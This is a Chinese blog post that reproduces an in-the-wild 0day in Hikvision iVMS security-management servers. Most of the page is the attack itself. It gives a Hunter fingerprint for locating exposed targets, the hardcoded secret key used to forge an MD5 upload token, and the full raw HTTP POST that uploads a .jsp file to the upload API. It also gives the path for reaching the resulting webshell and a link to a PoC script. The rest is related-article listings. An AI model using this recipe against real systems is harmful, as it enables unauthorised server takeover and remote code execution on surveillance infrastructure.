海康威视iVMS系统在野 0day漏洞复现

已于 2023-05-26 11:59:55 修改
阅读量2k 收藏 2
点赞数 5
文章标签: web安全 安全
于 2023-05-26 11:09:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46371267/article/details/130882819
版权

漏洞概述

简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。

hunter指纹

web.icon==“3670cbb1369332b296ce44a94b7dd685”

漏洞复现

漏洞url:/eps/api/resourceOperations/upload
检测脚本PoC:https://github.com/sccmdaveli/hikvision-poc

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8dWQYCDE-1685070423570)(D:\桌面\day\image-20230525201837124.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2DlFd9sb-1685070423571)(D:\桌面\day\image-20230525202141120.png)]

可以看到需要token,这俩token需要用url+secretkey的md5值进行绕过

http://url/eps/api/resourceOperations/uploadsecretKeyIbuilding

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fwquC35f-1685070423571)(D:\桌面\day\image-20230525202257753.png)]

进行上传

POST /eps/api/resourceOperations/upload?token=Token值 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Cookie: ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
Content-Length: 179
Content-Type: multipart/form-data; boundary=f7d1250b2d43db9324c19e1073573ce6

–f7d1250b2d43db9324c19e1073573ce6
Content-Disposition: form-data; name=“fileUploader”; filename=“1.jsp”
Content-Type: image/jpeg

test
–f7d1250b2d43db9324c19e1073573ce6–

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xP831n4H-1685070423571)(D:\桌面\day\image-20230525202502872.png)]

访问路径http://url/eps/upload/uid.jsp

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EStTtkST-1685070423572)(D:\桌面\day\image-20230525202547005.png)]

然后就可以愉快的刷洞了

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ujRVhzzx-1685070423572)(D:\桌面\day\image-20230525202646095.png)]
更为详细链接为:https://blog.csdn.net/qq_41904294/article/details/130807691

Fa1hai1
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
0day复现海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞
记录并分享学习安全的知识点..
10-17 2033
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。 ​
海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
qq_50854662的博客
06-30 2178
海康威视iVMS综合安防系统任意文件上传漏洞复现0day
Goby 漏洞更新 |海康威视部分iVMS系统存在文件上传漏洞_海康威视部分 ivms 系统存在文件上传高危漏洞
最新发布
2401_84240742的博客
04-17 627
海康威视-iVMS综合安防管理平台是一套“集成化”、“数字化”、“智能化”的平台,包含视频、报警、门禁、访客、梯控、巡查、考勤、消费、停车场、可视对讲等多个子系统海康威视-iVMS综合安防管理平台是一套“集成化”、“数字化”、“智能化”的平台,包含视频、报警、门禁、访客、梯控、巡查、考勤、消费、停车场、可视对讲等多个子系统。IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
海康威视 0day_海康威视摄像机壁装支架DS-1292ZJ 海康白 压铸铝合金材质
weixin_39777540的博客
10-22 520
DS-1292ZJ 海康威视压铸铝合金材质海康白摄像机壁装支架 适合枪型/筒型/一体型壁装摄像机支架 支架带出线孔,安装更加美观 DS-1292ZJ DS-1292ZJ(海康白) 海康壁装摄像机支架 海康壁装摄像机支架 DS-1292ZJ(海康白) 主要特性: 压铸铝合金材质,表面做喷塑处理 支架带出线孔,安装更加美观 摄像机安装座表面有海绵垫,保证和摄像机底座结合更紧密 摄像机安装座可旋...
海康威视 0day_海康威视向公益组织开放AI能力,将与世界自然基金会合作
weixin_39721924的博客
10-30 102
10月23日,海康威视启动“STAR公益伙伴计划”,宣布向各类公益组织免费开放AI能力,帮助其开展创新公益活动,世界自然基金会(WWF)成为该计划首个战略合作伙伴。STAR公益伙伴计划发布现场“人工智能、大数据等技术已成为开展公益项目的创新手段。”海康威视自然生态行业解决方案工程师沈锦程表示,基于AI开放平台训练的识别算法,已经可以实现对大中型哺乳动物、鸟类等野生动物的快速检测、分类、记...
海康威视 0day_清华紫光原厂3D TLC颗粒初体验,海康威视C2000 PRO 2TB版体验
weixin_39937635的博客
10-23 323
前言近来感觉原有M.2的固态空间实在太小了,所以很想换个更大容量的M.2固态。目前市面上1TB的M.2固态还是比较多的,但是2TB的M.2固态就比较少了。正好之前看到了海康威视C2000 PRO 2TB版在做活动,所以就入手了。看中这款主要还是因为价格,我是准备放系统、软件和游戏,而且这款M.2固态有10年质保。老版的C2000 PRO采用的是东芝的颗粒,而新版的海康威视C2000 PRO则是清华...
海康威视 0day_某拼又有车了,海康威视固态万人团,不管好不好听我别急着上车...
weixin_39844590的博客
10-23 161
Hello大家好,我是兼容机之家的咖啡。海康威视是全球领先的以视频为核心的物联网解决方案提供商,致力于不断提升视频处理技术和视频分析技术,面向全球提供领先的监控产品和技术解决方案。但是这么一个做监控安防的企业跨行做起了固态,并且因为价格便宜,提供十年保修而被大家熟知,要知道传统品牌最多也不过五年质保。现在拼夕夕上面搞起了万人团活动,价格已然是近期的最低价,但是,是不是官方搞得我们就不得而知,以至于...
海康威视iVMS-4200 Video Wall 2.6.17.5客户端
11-29
海康威视iVMS-4200 Video Wall 2.6.17.5客户端,随机光盘拷贝,含用户手册
海康威视 IVMS-8700综合管理平台操作手册
09-18
海康威视 IVMS-8700综合管理平台操作手册,门禁、考勤、安防、访客、车辆管理系统、消费系统等综合软件平台
海康威视IVMS-8700PC客户端操作指南
03-24
海康威视IVMS-8700平台 PC端客户端操作指南,客户端软件说明书
海康威视IVMS-8700车底检测系统操作指南
03-24
海康威视IVMS-8700平台车底检测系统客户端操作指南,客户端软件说明书。
海康威视IVMS-8700网页配置指南
03-24
海康威视IVMS-8700平台 WEB配置指南,平台配置说明书。
0day复现海康威视综合安防管理平台SSRF服务器端请求伪造漏洞
记录并分享学习安全的知识点..
08-12 606
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,康威视综合安防管理平台SSRF服务器端请求伪造漏洞
海康威视iVMS综合安防系统任意文件上传(0Day)
失心少年
08-11 2013
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!攻击者通过请求/svm/api/external/report接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。2.链接马径:/portal/ui/login/…
海康威视iVMS综合安防系统任意文件上传漏洞复现0day
热门推荐
0xSec
05-22 1万+
海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
漏洞复现海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
做自己喜欢的事,并将其发挥到极致!
06-02 1万+
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload 接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行。
海康威视漏洞合集
weixin_46626737的博客
07-03 3753
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc漏洞版本:大多数设备。
海康威视综合安防管理平台Fastjson远程命令执行漏洞
holyxp的博客
07-24 1711
综合安防管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。
漏洞复现海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-28 7835
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
海康威视ivms-8700联网网关使用说明书
07-12
海康威视IVMS-8700联网网关是一种用于连接海康威视视频监控设备和云平台的设备。它可以通过互联网将监控设备接入到云端,并提供远程管理和控制的功能。 使用说明书包含以下内容: 1. 硬件安装:首先,将联网网关与本地网络连接,可以通过有线或无线方式进行连接。确保联网网关和监控设备都已经正确连接并供电。 2. 软件安装:安装并打开IVMS-8700联网网关软件,根据软件提示进行操作。在软件中输入联网网关的相关信息,如IP地址和端口号等。 3. 设备接入:添加监控设备到联网网关中,可以通过搜索设备、手动输入设备信息或导入设备列表的方式进行添加。确保设备连接正常并获取到视频信号。 4. 云平台接入:在联网网关软件中设置云平台的相关参数,以便将监控设备接入到云端。确保云平台账号和联网网关绑定成功。 5. 远程管理和控制:通过IVMS-8700联网网关软件,可以远程查看监控设备的视频画面,进行录像回放,设置报警联动等功能。可以随时随地通过云平台进行监控和管理。 6. 故障排除:如果在使用过程中遇到问题,可以参考说明书中的故障排除部分。一般常见的问题包括设备无法连接、视频画面模糊等,可以尝试重新连接设备、调整画质等方法来解决。 综上所述,使用海康威视IVMS-8700联网网关可以方便地将监控设备接入云平台,提供了远程管理和控制的功能,使得监控更加便捷。使用说明书详细介绍了硬件和软件的安装步骤,以及设备接入、云平台接入、远程管理和故障排除等内容,帮助用户顺利使用和操作联网网关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值